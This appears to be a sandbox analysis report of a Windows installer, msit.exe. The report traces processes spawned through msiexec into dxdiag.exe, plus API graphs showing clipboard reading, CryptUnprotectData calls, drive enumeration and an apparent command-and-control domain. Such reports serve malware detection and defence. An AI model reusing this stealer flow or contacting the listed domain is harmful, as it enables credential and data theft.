                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=hajq77m5kie11rlman4pg7brqm; expires=Fri, 09 May 2025 01:21:30 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tA9gVXEjFVYDUTbYmPJOylowzCodB84QLBcrS8PHSSAlITAUQuEOAirZnJFYWeVgUu7rFZbJydUShnEtIcBJ3Ke7d571SHF7AGucDfFdrncjReXWGHEhUoTr10oJTikyzlgFSY1z"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 9013b4c8d93d199d-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1817&min_rtt=1813&rtt_var=689&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=983&delivery_rate=1576673&cwnd=223&unsent_bytes=0&cid=7bf7ac7f8af054b7&ts=516&x=0"
                                                                                                              2025-01-13 07:34:51 UTC54INData Raw: 33 30 0d 0a 4c 78 76 52 2b 43 65 77 5a 64 67 56 45 53 38 79 30 57 2b 59 7a 62 39 31 77 7a 48 63 49 31 4b 44 65 41 4b 58 4b 53 43 66 4d 66 56 30 52 67 3d 3d 0d 0a
                                                                                                              Data Ascii: 30LxvR+CewZdgVES8y0W+Yzb91wzHcI1KDeAKXKSCfMfV0Rg==
                                                                                                              2025-01-13 07:34:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Click to jump to process

                                                                                                              Click to jump to process

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Click to jump to process

                                                                                                              Target ID:0
                                                                                                              Start time:02:34:30
                                                                                                              Start date:13/01/2025
                                                                                                              Path:C:\Users\user\Desktop\msit.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\msit.exe"
                                                                                                              Imagebase:0x750000
                                                                                                              File size:20'182'372 bytes
                                                                                                              MD5 hash:BB0CA87D28E7C1BFD53E3E592E75E684
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:2
                                                                                                              Start time:02:34:33
                                                                                                              Start date:13/01/2025
                                                                                                              Path:C:\Windows\System32\msiexec.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                              Imagebase:0x7ff7b8650000
                                                                                                              File size:69'632 bytes
                                                                                                              MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Target ID:3
                                                                                                              Start time:02:34:33
                                                                                                              Start date:13/01/2025
                                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 56DA3E3074202857EDF0B1EB72289577 C
                                                                                                              Imagebase:0x640000
                                                                                                              File size:59'904 bytes
                                                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:4
                                                                                                              Start time:02:34:34
                                                                                                              Start date:13/01/2025
                                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\msit\msit 1.0.1\install\C07CAF6\msit.msi" /qn /norestart AI_SETUPEXEPATH=C:\Users\user\Desktop\msit.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1736753519 "
                                                                                                              Imagebase:0x640000
                                                                                                              File size:59'904 bytes
                                                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:5
                                                                                                              Start time:02:34:36
                                                                                                              Start date:13/01/2025
                                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding EF3F630DCAE1FED200E8C4DC6E58965E
                                                                                                              Imagebase:0x640000
                                                                                                              File size:59'904 bytes
                                                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:6
                                                                                                              Start time:02:34:37
                                                                                                              Start date:13/01/2025
                                                                                                              Path:C:\Windows\Installer\MSIA455.tmp
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\Installer\MSIA455.tmp"
                                                                                                              Imagebase:0x7ff68e4b0000
                                                                                                              File size:13'084'160 bytes
                                                                                                              MD5 hash:4D82074854750FDBA89D76624CC1E6F6
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              • Detection: 63%, ReversingLabs
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:7
                                                                                                              Start time:02:34:38
                                                                                                              Start date:13/01/2025
                                                                                                              Path:C:\Windows\SysWOW64\dxdiag.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                                                                              Imagebase:0x280000
                                                                                                              File size:222'720 bytes
                                                                                                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate
                                                                                                              Has exited:true

                                                                                                              Reset < >
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1590444702.00007FF68E4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68E4B0000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1590423797.00007FF68E4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1590547518.00007FF68E59D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1591492297.00007FF68EF9C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1591595541.00007FF68F0DC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1591618402.00007FF68F0E1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1591641127.00007FF68F0E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ff68e4b0000_MSIA455.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2933794660-0
                                                                                                                • Opcode ID: b3714b1e3f62d450d5574a026c88cc5e2d9c1db1de04dfe777e3adf5dec47836
                                                                                                                • Instruction ID: 1be677b68d996cd8c821f8bc89af41961fe1d6fa25f1dc2d10906a475e0dae51
                                                                                                                • Opcode Fuzzy Hash: b3714b1e3f62d450d5574a026c88cc5e2d9c1db1de04dfe777e3adf5dec47836
                                                                                                                • Instruction Fuzzy Hash: 9F111C32B55B05CAEB009FA0E8542A833A4FB59758F440A35EE6D877A4DF78D155C340

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:9%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:70.1%
                                                                                                                Total number of Nodes:288
                                                                                                                Total number of Limit Nodes:24
                                                                                                                execution_graph 13641 408920 13643 40892c 13641->13643 13642 408a83 ExitProcess 13643->13642 13644 408941 GetCurrentProcessId GetCurrentThreadId 13643->13644 13647 408a0f 13643->13647 13645 408967 13644->13645 13646 40896b GetForegroundWindow 13644->13646 13645->13646 13646->13647 13647->13642 13648 431262 13649 431267 13648->13649 13650 43129d GetSystemMetrics GetSystemMetrics 13649->13650 13651 4312dc 13650->13651 13652 40d2e1 13653 40d2f0 13652->13653 13654 40d38a 13653->13654 13656 439e40 LdrInitializeThunk 13653->13656 13656->13654 13657 43a361 13658 43a3a0 13657->13658 13659 43a4ce 13658->13659 13661 439e40 LdrInitializeThunk 13658->13661 13661->13659 13662 420720 13663 420780 13662->13663 13664 42072e 13662->13664 13668 420840 13664->13668 13666 4207fc 13666->13663 13667 41ec80 RtlAllocateHeap RtlReAllocateHeap LdrInitializeThunk 13666->13667 13667->13663 13669 420850 13668->13669 13669->13669 13670 43c3b0 LdrInitializeThunk 13669->13670 13671 42091f 13670->13671 13335 438640 13336 438660 13335->13336 13337 43869e 13336->13337 13343 439e40 LdrInitializeThunk 13336->13343 13342 43878f 13337->13342 13344 4385e0 13337->13344 13340 438737 13340->13342 13347 439e40 LdrInitializeThunk 13340->13347 13343->13337 13348 43b690 13344->13348 13346 4385ea RtlAllocateHeap 13346->13340 13347->13342 13349 43b6a0 13348->13349 13349->13346 13349->13349 13350 40dbc4 13351 40dbd0 13350->13351 13380 4227b0 13351->13380 13353 40dbd6 13390 422e10 13353->13390 13355 40dbf2 13394 4230c0 13355->13394 13357 40dc0e 13400 424dd0 13357->13400 13361 40dc30 13420 425800 13361->13420 13363 40dc39 13433 4303f0 OpenClipboard 13363->13433 13365 40dc83 13366 4227b0 3 API calls 13365->13366 13367 40dca2 13366->13367 13368 422e10 2 API calls 13367->13368 13369 40dcbe 13368->13369 13370 4230c0 2 API calls 13369->13370 13371 40dcda 13370->13371 13372 424dd0 3 API calls 13371->13372 13373 40dcf3 13372->13373 13374 425480 2 API calls 13373->13374 13375 40dcfc 13374->13375 13376 425800 2 API calls 13375->13376 13377 40dd05 13376->13377 13378 4303f0 6 API calls 13377->13378 13379 40dd4f 13378->13379 13386 422830 13380->13386 13381 42292c 13381->13353 13382 422b91 GetLogicalDrives 13385 43c3b0 LdrInitializeThunk 13382->13385 13384 422a20 13384->13382 13384->13384 13387 422ba3 13384->13387 13389 422bb4 13384->13389 13385->13387 13386->13381 13386->13384 13386->13386 13440 43c3b0 13386->13440 13387->13387 13387->13389 13444 420b10 13387->13444 13389->13353 13393 422e20 13390->13393 13391 422fa0 13391->13355 13391->13391 13393->13391 13465 43ccf0 13393->13465 13395 4230ce 13394->13395 13475 43c8f0 13395->13475 13397 43ccf0 2 API calls 13399 422e20 13397->13399 13398 422fa0 13398->13357 13398->13398 13399->13397 13399->13398 13401 424df6 13400->13401 13402 425040 13400->13402 13403 40dc27 13400->13403 13410 425058 13400->13410 13401->13402 13401->13403 13404 43ccf0 2 API calls 13401->13404 13408 43c8f0 LdrInitializeThunk 13401->13408 13401->13410 13480 439de0 13402->13480 13412 425480 13403->13412 13404->13401 13406 43c8f0 LdrInitializeThunk 13406->13410 13408->13401 13410->13403 13410->13406 13411 439e40 LdrInitializeThunk 13410->13411 13486 43ca10 13410->13486 13494 43d400 13410->13494 13411->13410 13413 4254a0 13412->13413 13414 4254ee 13413->13414 13506 439e40 LdrInitializeThunk 13413->13506 13416 4385e0 RtlAllocateHeap 13414->13416 13417 4255fe 13414->13417 13418 425592 13416->13418 13417->13361 13418->13417 13507 439e40 LdrInitializeThunk 13418->13507 13508 425820 13420->13508 13422 425814 13422->13363 13423 425809 13423->13422 13527 436800 13423->13527 13425 43c210 LdrInitializeThunk 13428 42603b 13425->13428 13428->13425 13429 426065 13428->13429 13430 426476 13428->13430 13534 43c550 13428->13534 13538 43c620 13428->13538 13429->13363 13430->13429 13544 439e40 LdrInitializeThunk 13430->13544 13432 4267fd 13434 43058b 13433->13434 13435 430418 GetWindowLongW GetClipboardData 13433->13435 13434->13365 13436 430583 CloseClipboard 13435->13436 13437 43044f GlobalLock 13435->13437 13436->13434 13439 430465 13437->13439 13438 430575 GlobalUnlock 13438->13436 13439->13438 13442 43c3d0 13440->13442 13441 43c4fe 13441->13384 13442->13441 13456 439e40 LdrInitializeThunk 13442->13456 13457 43c210 13444->13457 13446 42123d 13446->13389 13447 420b50 13447->13446 13448 4385e0 RtlAllocateHeap 13447->13448 13449 420b8e 13448->13449 13455 420bf8 13449->13455 13461 439e40 LdrInitializeThunk 13449->13461 13451 4385e0 RtlAllocateHeap 13451->13455 13452 4211c5 13452->13446 13463 439e40 LdrInitializeThunk 13452->13463 13455->13451 13455->13452 13462 439e40 LdrInitializeThunk 13455->13462 13456->13441 13459 43c230 13457->13459 13458 43c35e 13458->13447 13459->13458 13464 439e40 LdrInitializeThunk 13459->13464 13461->13449 13462->13455 13463->13452 13464->13458 13466 43cd10 13465->13466 13467 43cd5e 13466->13467 13473 439e40 LdrInitializeThunk 13466->13473 13469 4385e0 RtlAllocateHeap 13467->13469 13472 43ce8e 13467->13472 13470 43ce0f 13469->13470 13470->13472 13474 439e40 LdrInitializeThunk 13470->13474 13472->13393 13472->13472 13473->13467 13474->13472 13477 43c910 13475->13477 13476 43c9df 13476->13399 13477->13476 13479 439e40 LdrInitializeThunk 13477->13479 13479->13476 13481 439df8 13480->13481 13482 439e1a 13480->13482 13485 439e20 13480->13485 13484 439e0b RtlReAllocateHeap 13481->13484 13481->13485 13483 4385e0 RtlAllocateHeap 13482->13483 13483->13485 13484->13485 13485->13410 13487 43ca40 13486->13487 13488 43ca98 13487->13488 13502 439e40 LdrInitializeThunk 13487->13502 13490 4385e0 RtlAllocateHeap 13488->13490 13493 43cb93 13488->13493 13491 43cb16 13490->13491 13491->13493 13503 439e40 LdrInitializeThunk 13491->13503 13493->13410 13495 43d411 13494->13495 13496 43d53e 13495->13496 13504 439e40 LdrInitializeThunk 13495->13504 13498 4385e0 RtlAllocateHeap 13496->13498 13500 43d65f 13496->13500 13499 43d5c3 13498->13499 13499->13500 13505 439e40 LdrInitializeThunk 13499->13505 13500->13410 13502->13488 13503->13493 13504->13496 13505->13500 13506->13414 13507->13417 13509 425860 13508->13509 13509->13509 13545 438640 13509->13545 13511 4258ce 13553 4388c0 13511->13553 13516 425d2b 13516->13423 13517 425985 13517->13516 13518 4258e6 13517->13518 13522 425e7f 13517->13522 13565 438cd0 13517->13565 13569 438a00 13518->13569 13520 43c210 LdrInitializeThunk 13520->13522 13521 43c550 LdrInitializeThunk 13521->13522 13522->13423 13522->13516 13522->13520 13522->13521 13523 43c620 LdrInitializeThunk 13522->13523 13524 426476 13522->13524 13523->13522 13524->13516 13573 439e40 LdrInitializeThunk 13524->13573 13526 4267fd 13530 436830 13527->13530 13528 43c8f0 LdrInitializeThunk 13528->13530 13529 43ccf0 2 API calls 13529->13530 13530->13528 13530->13529 13531 436968 13530->13531 13532 43d400 2 API calls 13530->13532 13581 439e40 LdrInitializeThunk 13530->13581 13531->13428 13532->13530 13535 43c580 13534->13535 13535->13535 13536 43c5ce 13535->13536 13582 439e40 LdrInitializeThunk 13535->13582 13536->13428 13539 43c650 13538->13539 13541 43c69e 13539->13541 13583 439e40 LdrInitializeThunk 13539->13583 13540 43c73e 13540->13428 13541->13540 13541->13541 13584 439e40 LdrInitializeThunk 13541->13584 13544->13432 13546 438660 13545->13546 13547 43869e 13546->13547 13574 439e40 LdrInitializeThunk 13546->13574 13548 4385e0 RtlAllocateHeap 13547->13548 13552 43878f 13547->13552 13550 438737 13548->13550 13550->13552 13575 439e40 LdrInitializeThunk 13550->13575 13552->13511 13554 4258da 13553->13554 13555 4388d1 13553->13555 13554->13517 13554->13518 13557 438d70 13554->13557 13555->13554 13576 439e40 LdrInitializeThunk 13555->13576 13558 438dc0 13557->13558 13564 438dfe 13558->13564 13577 439e40 LdrInitializeThunk 13558->13577 13559 43959e 13559->13517 13561 43954c 13561->13559 13578 439e40 LdrInitializeThunk 13561->13578 13563 439e40 LdrInitializeThunk 13563->13564 13564->13559 13564->13561 13564->13563 13567 438cf0 13565->13567 13566 438d3e 13566->13517 13567->13566 13579 439e40 LdrInitializeThunk 13567->13579 13570 438a5e 13569->13570 13571 438a0a 13569->13571 13570->13522 13571->13570 13580 439e40 LdrInitializeThunk 13571->13580 13573->13526 13574->13547 13575->13552 13576->13554 13577->13564 13578->13559 13579->13566 13580->13570 13581->13530 13582->13536 13583->13541 13584->13540 13672 42cee6 CoSetProxyBlanket 13673 40cda5 CoInitializeSecurity 13674 40d866 13675 40d8d0 13674->13675 13677 439e40 LdrInitializeThunk 13675->13677 13677->13675 13678 415971 13679 415976 13678->13679 13680 43c550 LdrInitializeThunk 13679->13680 13681 41598f 13680->13681 13682 43c620 LdrInitializeThunk 13681->13682 13683 4159d0 13681->13683 13682->13683 13687 415a7e 13683->13687 13688 439e40 LdrInitializeThunk 13683->13688 13685 415c3b 13685->13685 13686 415c0a CryptUnprotectData 13686->13685 13687->13685 13687->13686 13688->13687 13586 438612 13587 438622 13586->13587 13588 438620 13586->13588 13589 438627 RtlFreeHeap 13587->13589 13694 435530 13695 435555 13694->13695 13698 435624 13695->13698 13703 439e40 LdrInitializeThunk 13695->13703 13697 435801 13698->13697 13700 435705 13698->13700 13702 439e40 LdrInitializeThunk 13698->13702 13700->13697 13704 439e40 LdrInitializeThunk 13700->13704 13702->13698 13703->13695 13704->13700 13590 40cc16 CoInitializeEx CoInitializeEx 13591 433195 13595 43ba70 13591->13595 13594 4331df 13596 4331ad GetUserDefaultUILanguage 13595->13596 13596->13594 13597 40cdd7 13598 40cdf0 13597->13598 13601 435870 13598->13601 13600 40ce3b 13602 4358a0 CoCreateInstance 13601->13602 13604 435b21 SysAllocString 13602->13604 13605 435eeb 13602->13605 13608 435bb5 13604->13608 13607 435efb GetVolumeInformationW 13605->13607 13615 435f12 13607->13615 13609 435eda SysFreeString 13608->13609 13610 435bbd CoSetProxyBlanket 13608->13610 13609->13605 13611 435ed0 13610->13611 13612 435bdd SysAllocString 13610->13612 13611->13609 13614 435cd0 13612->13614 13614->13614 13616 435cf0 SysAllocString 13614->13616 13615->13600 13619 435d17 13616->13619 13617 435ebb SysFreeString SysFreeString 13617->13611 13618 435eb1 13618->13617 13619->13617 13619->13618 13620 435d5f VariantInit 13619->13620 13622 435db0 13620->13622 13621 435ea0 VariantClear 13621->13618 13622->13621 13705 43a7f4 13706 43a810 13705->13706 13707 43a85e 13706->13707 13712 439e40 LdrInitializeThunk 13706->13712 13711 439e40 LdrInitializeThunk 13707->13711 13710 43a926 13711->13710 13712->13707 13623 40e458 13629 409730 13623->13629 13625 40e45f CoUninitialize 13626 40e490 13625->13626 13627 40e7dc CoUninitialize 13626->13627 13628 40e800 13627->13628 13630 409744 13629->13630 13630->13625 13630->13630

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 0 435870-435898 1 4358a0-4358ca 0->1 1->1 2 4358cc-4358e1 1->2 3 4358f0-435917 2->3 3->3 4 435919-43595f 3->4 5 435960-4359a1 4->5 5->5 6 4359a3-4359bf 5->6 8 4359c5-4359ce 6->8 9 435a7f-435a8a 6->9 10 4359d0-435a1e 8->10 11 435a90-435abb 9->11 10->10 12 435a20-435a31 10->12 11->11 13 435abd-435b1b CoCreateInstance 11->13 16 435a40-435a6f 12->16 14 435b21-435b55 13->14 15 435eeb-435f10 call 43ba70 GetVolumeInformationW 13->15 17 435b60-435b8e 14->17 22 435f12-435f16 15->22 23 435f1a-435f1c 15->23 16->16 19 435a71-435a7b 16->19 17->17 20 435b90-435bb7 SysAllocString 17->20 19->9 26 435eda-435ee7 SysFreeString 20->26 27 435bbd-435bd7 CoSetProxyBlanket 20->27 22->23 25 435f39-435f40 23->25 28 435f42-435f49 25->28 29 435f59-435f6f 25->29 26->15 32 435ed0-435ed6 27->32 33 435bdd-435bf5 27->33 28->29 30 435f4b-435f57 28->30 31 435f70-435f96 29->31 30->29 31->31 34 435f98-435fb5 31->34 32->26 35 435c00-435c4f 33->35 36 435fc0-43600b 34->36 35->35 37 435c51-435cc7 SysAllocString 35->37 36->36 38 43600d-436038 call 41d8b0 36->38 39 435cd0-435cee 37->39 43 436040-43604b 38->43 39->39 41 435cf0-435d1d SysAllocString 39->41 46 435d23-435d45 41->46 47 435ebb-435ecd SysFreeString * 2 41->47 43->43 45 43604d-436059 43->45 48 435f20-435f33 45->48 49 43605f-43606f call 408170 45->49 53 435eb1-435eb7 46->53 54 435d4b-435d4e 46->54 47->32 48->25 51 436074-43607b 48->51 49->48 53->47 54->53 56 435d54-435d59 54->56 56->53 57 435d5f-435da7 VariantInit 56->57 58 435db0-435dc4 57->58 58->58 59 435dc6-435dd0 58->59 60 435dd4-435dd6 59->60 61 435ea0-435ead VariantClear 60->61 62 435ddc-435de2 60->62 61->53 62->61 63 435de8-435df6 62->63 64 435e35 63->64 65 435df8-435dfd 63->65 66 435e37-435e5f call 407fd0 call 408e70 64->66 67 435e0c-435e10 65->67 78 435e61 66->78 79 435e66-435e72 66->79 69 435e12-435e1b 67->69 70 435e00 67->70 73 435e22-435e26 69->73 74 435e1d-435e20 69->74 72 435e01-435e0a 70->72 72->66 72->67 73->72 75 435e28-435e33 73->75 74->72 75->72 78->79 80 435e74 79->80 81 435e79-435e9c call 408000 call 407fe0 79->81 80->81 81->61
                                                                                                                APIs
                                                                                                                • CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C,00000000), ref: 00435B0F
                                                                                                                • SysAllocString.OLEAUT32(0000D588), ref: 00435B91
                                                                                                                • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00435BCF
                                                                                                                • SysAllocString.OLEAUT32(s%w'), ref: 00435C56
                                                                                                                • SysAllocString.OLEAUT32(s%w'), ref: 00435CF1
                                                                                                                • VariantInit.OLEAUT32(83828188), ref: 00435D64
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                                                                • String ID: /#$%$PQ$d)*+$s%w'
                                                                                                                • API String ID: 65563702-3008678497
                                                                                                                • Opcode ID: 7415687139be6af64604c01401749847364b03682915530e4ff1219a9867d2af
                                                                                                                • Instruction ID: 5414f25a513856cf292a94d973b8fe981ab4f01926d2cca0fa1231f3848f9231
                                                                                                                • Opcode Fuzzy Hash: 7415687139be6af64604c01401749847364b03682915530e4ff1219a9867d2af
                                                                                                                • Instruction Fuzzy Hash: 50220E71A087009BD710DF29C881B6BBBE5EFC9710F14892EF4959B391D738D90ACB86

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 96 40e458-40e482 call 409730 CoUninitialize 99 40e490-40e504 96->99 99->99 100 40e506-40e519 99->100 101 40e520-40e532 100->101 101->101 102 40e534-40e573 101->102 103 40e580-40e5b2 102->103 103->103 104 40e5b4-40e5be 103->104 105 40e5c0-40e5c8 104->105 106 40e5db-40e5e6 104->106 107 40e5d0-40e5d9 105->107 108 40e5e8-40e5e9 106->108 109 40e5fb-40e603 106->109 107->106 107->107 110 40e5f0-40e5f9 108->110 111 40e605-40e608 109->111 112 40e61b-40e626 109->112 110->109 110->110 115 40e610-40e619 111->115 113 40e628-40e62f 112->113 114 40e63d 112->114 116 40e630-40e639 113->116 117 40e640-40e64b 114->117 115->112 115->115 116->116 118 40e63b 116->118 119 40e65b-40e667 117->119 120 40e64d-40e64f 117->120 118->117 122 40e681-40e73f 119->122 123 40e669-40e66b 119->123 121 40e650-40e659 120->121 121->119 121->121 125 40e740-40e777 122->125 124 40e670-40e67d 123->124 124->124 126 40e67f 124->126 125->125 127 40e779-40e794 125->127 126->122 128 40e7a0-40e7b2 127->128 128->128 129 40e7b4-40e7ff call 40b7d0 call 409730 CoUninitialize 128->129 134 40e800-40e874 129->134 134->134 135 40e876-40e889 134->135 136 40e890-40e8a2 135->136 136->136 137 40e8a4-40e8e3 136->137 138 40e8f0-40e922 137->138 138->138 139 40e924-40e92e 138->139 140 40e930-40e938 139->140 141 40e94b-40e956 139->141 142 40e940-40e949 140->142 143 40e958-40e959 141->143 144 40e96b-40e973 141->144 142->141 142->142 147 40e960-40e969 143->147 145 40e975-40e978 144->145 146 40e98b-40e996 144->146 148 40e980-40e989 145->148 149 40e998-40e99f 146->149 150 40e9ad 146->150 147->144 147->147 148->146 148->148 151 40e9a0-40e9a9 149->151 152 40e9b0-40e9bb 150->152 151->151 153 40e9ab 151->153 154 40e9cb-40e9d7 152->154 155 40e9bd-40e9bf 152->155 153->152 157 40e9f1-40eab8 154->157 158 40e9d9-40e9db 154->158 156 40e9c0-40e9c9 155->156 156->154 156->156 159 40eac0-40eaf7 157->159 160 40e9e0-40e9ed 158->160 159->159 161 40eaf9-40eb17 159->161 160->160 162 40e9ef 160->162 163 40eb20-40eb32 161->163 162->157 163->163 164 40eb34-40eb4d call 40b7d0 163->164 166 40eb52-40eb75 164->166
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Uninitialize
                                                                                                                • String ID: 2t$Qv$[^Q$$fixxyplanterv.click$qy$vol,$yp
                                                                                                                • API String ID: 3861434553-2046213541
                                                                                                                • Opcode ID: fceb5d04364534c2d7f3e13c311d28cf7798b8fad78054c5397cc8bfe06279b1
                                                                                                                • Instruction ID: 4db51f1f72c5905ee0b1b22d732d3a9d787199a41c6fab9545acfa54408a17bb
                                                                                                                • Opcode Fuzzy Hash: fceb5d04364534c2d7f3e13c311d28cf7798b8fad78054c5397cc8bfe06279b1
                                                                                                                • Instruction Fuzzy Hash: E9120CB56047818FD325CF36C590622BFA2FF96304B1989ADC4D25FB92C739B816CB94

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 171 40cdd7-40cde7 172 40cdf0-40ce22 171->172 172->172 173 40ce24-40ce51 call 408850 call 435870 172->173 178 40ce60-40cea7 173->178 178->178 179 40cea9-40ceef 178->179 180 40cef0-40cf02 179->180 180->180 181 40cf04-40cf0c 180->181 182 40cf2b-40cf33 181->182 183 40cf0e-40cf12 181->183 185 40cf62 182->185 186 40cf35-40cf39 182->186 184 40cf20-40cf29 183->184 184->182 184->184 188 40cf65-40cf6d 185->188 187 40cf40-40cf49 186->187 187->187 191 40cf4b 187->191 189 40cf8d 188->189 190 40cf6f-40cf73 188->190 193 40cf90-40cf98 189->193 192 40cf80-40cf89 190->192 191->188 192->192 194 40cf8b 192->194 195 40cf9a-40cf9b 193->195 196 40cfab-40d05f 193->196 194->193 197 40cfa0-40cfa9 195->197 198 40d060-40d072 196->198 197->196 197->197 198->198 199 40d074-40d08f 198->199 200 40d090-40d0d8 199->200 200->200 201 40d0da-40d0f7 call 40b7d0 200->201 203 40d0fc-40d117 201->203
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 9n`$AVUF$FD089AA551ECCED45EC6468C5C963249$VD}N$fixxyplanterv.click$nx}v$RT$Z&\
                                                                                                                • API String ID: 0-2497581166
                                                                                                                • Opcode ID: 0ace5b6c8ecb4935f6ce6248a84e79c11aceaef049d8069478d5b93df471d7c2
                                                                                                                • Instruction ID: d82674ca07e07c92295c7b8026b48e690f7d2c28deac3183c156c38ed5531bfa
                                                                                                                • Opcode Fuzzy Hash: 0ace5b6c8ecb4935f6ce6248a84e79c11aceaef049d8069478d5b93df471d7c2
                                                                                                                • Instruction Fuzzy Hash: 359136B0204B82DFD315CF2AC490262FFA2FF56304B28866DC4965BB95C779B816CF94

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
